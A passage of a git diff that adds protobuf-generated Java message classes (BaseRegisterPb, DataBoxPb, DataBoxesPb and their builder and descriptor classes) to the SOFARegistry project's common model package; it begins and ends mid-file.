getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOrBuilder.java new file mode 100644 index 000000000..4bc66d4d8 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOrBuilder.java @@ -0,0 +1,101 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface BaseRegisterPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:BaseRegisterPb) + com.google.protobuf.MessageOrBuilder { + + /** string instanceId = 1; */ + java.lang.String getInstanceId(); + /** string instanceId = 1; */ + com.google.protobuf.ByteString getInstanceIdBytes(); + + /** string zone = 2; */ + java.lang.String getZone(); + /** string zone = 2; */ + com.google.protobuf.ByteString getZoneBytes(); + + /** string appName = 3; */ + java.lang.String getAppName(); + /** string appName = 3; */ + com.google.protobuf.ByteString getAppNameBytes(); + + /** string dataId = 4; */ + java.lang.String getDataId(); + /** string dataId = 4; */ + com.google.protobuf.ByteString getDataIdBytes(); + + /** string group = 5; */ + java.lang.String getGroup(); + /** string group = 5; */ + com.google.protobuf.ByteString getGroupBytes(); + + /** string processId = 6; */ + java.lang.String getProcessId(); + /** string processId = 6; */ + com.google.protobuf.ByteString getProcessIdBytes(); + + /** string registId = 7; */ + java.lang.String getRegistId(); + /** string registId = 7; */ + com.google.protobuf.ByteString getRegistIdBytes(); + + /** string clientId = 8; */ + java.lang.String getClientId(); + /** string clientId = 8; */ + com.google.protobuf.ByteString getClientIdBytes(); + + /** string dataInfoId = 9; */ + java.lang.String getDataInfoId(); + /** string dataInfoId = 9; */ + com.google.protobuf.ByteString getDataInfoIdBytes(); + + /** string ip = 10; */ + java.lang.String getIp(); + /** string ip = 10; */ + com.google.protobuf.ByteString getIpBytes(); + + /** int32 port = 11; */ + int getPort(); + + /** string eventType = 12; */ + java.lang.String getEventType(); + /** string eventType = 12; */ + com.google.protobuf.ByteString getEventTypeBytes(); + + /** int64 version = 13; */ + long getVersion(); + + /** int64 timestamp = 14; */ + long getTimestamp(); + + /** map<string, string> attributes = 15; */ + int getAttributesCount(); + /** map<string, string> attributes = 15; */ + boolean containsAttributes(java.lang.String key); + /** Use {@link #getAttributesMap()} instead. */ + @java.lang.Deprecated + java.util.Map getAttributes(); + /** map<string, string> attributes = 15; */ + java.util.Map getAttributesMap(); + /** map<string, string> attributes = 15; */ + java.lang.String getAttributesOrDefault(java.lang.String key, java.lang.String defaultValue); + /** map<string, string> attributes = 15; */ + java.lang.String getAttributesOrThrow(java.lang.String key); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOuterClass.java new file mode 100644 index 000000000..6adc6ffc0 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPbOuterClass.java @@ -0,0 +1,99 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class BaseRegisterPbOuterClass { + private BaseRegisterPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_BaseRegisterPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_BaseRegisterPb_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_BaseRegisterPb_AttributesEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_BaseRegisterPb_AttributesEntry_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\024BaseRegisterPb.proto\"\346\002\n\016BaseRegisterP" + + "b\022\022\n\ninstanceId\030\001 \001(\t\022\014\n\004zone\030\002 \001(\t\022\017\n\007a" + + "ppName\030\003 \001(\t\022\016\n\006dataId\030\004 \001(\t\022\r\n\005group\030\005 " + + "\001(\t\022\021\n\tprocessId\030\006 \001(\t\022\020\n\010registId\030\007 \001(\t" + + "\022\020\n\010clientId\030\010 \001(\t\022\022\n\ndataInfoId\030\t \001(\t\022\n" + + "\n\002ip\030\n \001(\t\022\014\n\004port\030\013 \001(\005\022\021\n\teventType\030\014 " + + "\001(\t\022\017\n\007version\030\r \001(\003\022\021\n\ttimestamp\030\016 \001(\003\022" + + "3\n\nattributes\030\017 \003(\0132\037.BaseRegisterPb.Att" + + "ributesEntry\0321\n\017AttributesEntry\022\013\n\003key\030\001" + + " \001(\t\022\r\n\005value\030\002 \001(\t:\0028\001B7\n/com.alipay.so" + + "fa.registry.common.model.client.pbP\001Z\002pb" + + "b\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_BaseRegisterPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_BaseRegisterPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_BaseRegisterPb_descriptor, + new java.lang.String[] { + "InstanceId", + "Zone", + "AppName", + "DataId", + "Group", + "ProcessId", + "RegistId", + "ClientId", + "DataInfoId", + "Ip", + "Port", + "EventType", + "Version", + "Timestamp", + "Attributes", + }); + internal_static_BaseRegisterPb_AttributesEntry_descriptor = + internal_static_BaseRegisterPb_descriptor.getNestedTypes().get(0); + internal_static_BaseRegisterPb_AttributesEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_BaseRegisterPb_AttributesEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPb.java new file mode 100644 index 000000000..ffc2dafd6 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPb.java @@ -0,0 +1,516 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code DataBoxPb} */ +public final class DataBoxPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:DataBoxPb) + DataBoxPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use DataBoxPb.newBuilder() to construct. + private DataBoxPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private DataBoxPb() { + data_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private DataBoxPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + data_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass + .internal_static_DataBoxPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass + .internal_static_DataBoxPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.class, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder.class); + } + + public static final int DATA_FIELD_NUMBER = 1; + private volatile java.lang.Object data_; + /** string data = 1; */ + public java.lang.String getData() { + java.lang.Object ref = data_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + data_ = s; + return s; + } + } + /** string data = 1; */ + public com.google.protobuf.ByteString getDataBytes() { + java.lang.Object ref = data_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + data_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getDataBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, data_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getDataBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, data_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.DataBoxPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb other = + (com.alipay.sofa.registry.common.model.client.pb.DataBoxPb) obj; + + boolean result = true; + result = result && getData().equals(other.getData()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + DATA_FIELD_NUMBER; + hash = (53 * hash) + getData().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code DataBoxPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:DataBoxPb) + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass + .internal_static_DataBoxPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass + .internal_static_DataBoxPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.class, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + data_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass + .internal_static_DataBoxPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb build() { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb result = + new com.alipay.sofa.registry.common.model.client.pb.DataBoxPb(this); + result.data_ = data_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.DataBoxPb) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.DataBoxPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.DataBoxPb other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance()) + return this; + if (!other.getData().isEmpty()) { + data_ = other.data_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.DataBoxPb) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private java.lang.Object data_ = ""; + /** string data = 1; */ + public java.lang.String getData() { + java.lang.Object ref = data_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + data_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string data = 1; */ + public com.google.protobuf.ByteString getDataBytes() { + java.lang.Object ref = data_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + data_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string data = 1; */ + public Builder setData(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + data_ = value; + onChanged(); + return this; + } + /** string data = 1; */ + public Builder clearData() { + + data_ = getDefaultInstance().getData(); + onChanged(); + return this; + } + /** string data = 1; */ + public Builder setDataBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + data_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:DataBoxPb) + } + + // @@protoc_insertion_point(class_scope:DataBoxPb) + private static final com.alipay.sofa.registry.common.model.client.pb.DataBoxPb DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.DataBoxPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public DataBoxPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new DataBoxPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOrBuilder.java new file mode 100644 index 000000000..99156c28e --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOrBuilder.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface DataBoxPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:DataBoxPb) + com.google.protobuf.MessageOrBuilder { + + /** string data = 1; */ + java.lang.String getData(); + /** string data = 1; */ + com.google.protobuf.ByteString getDataBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOuterClass.java new file mode 100644 index 000000000..07b87bdd2 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxPbOuterClass.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class DataBoxPbOuterClass { + private DataBoxPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_DataBoxPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_DataBoxPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\017DataBoxPb.proto\"\031\n\tDataBoxPb\022\014\n\004data\030\001" + + " \001(\tB7\n/com.alipay.sofa.registry.common." + + "model.client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_DataBoxPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_DataBoxPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_DataBoxPb_descriptor, + new java.lang.String[] { + "Data", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPb.java new file mode 100644 index 000000000..c8d58691a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/DataBoxesPb.java @@ -0,0 +1,736 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code DataBoxesPb} */ +public final class DataBoxesPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:DataBoxesPb) + DataBoxesPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use DataBoxesPb.newBuilder() to construct. + private DataBoxesPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private DataBoxesPb() { + data_ = java.util.Collections.emptyList(); + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private DataBoxesPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + data_ = + new java.util.ArrayList< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb>(); + mutable_bitField0_ |= 0x00000001; + } + data_.add( + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.parser(), + extensionRegistry)); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + data_ = java.util.Collections.unmodifiableList(data_); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass + .internal_static_DataBoxesPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.DataBoxesPbOuterClass + .internal_static_DataBoxesPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.class, + com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb.Builder.class); + } + + public static final int DATA_FIELD_NUMBER = 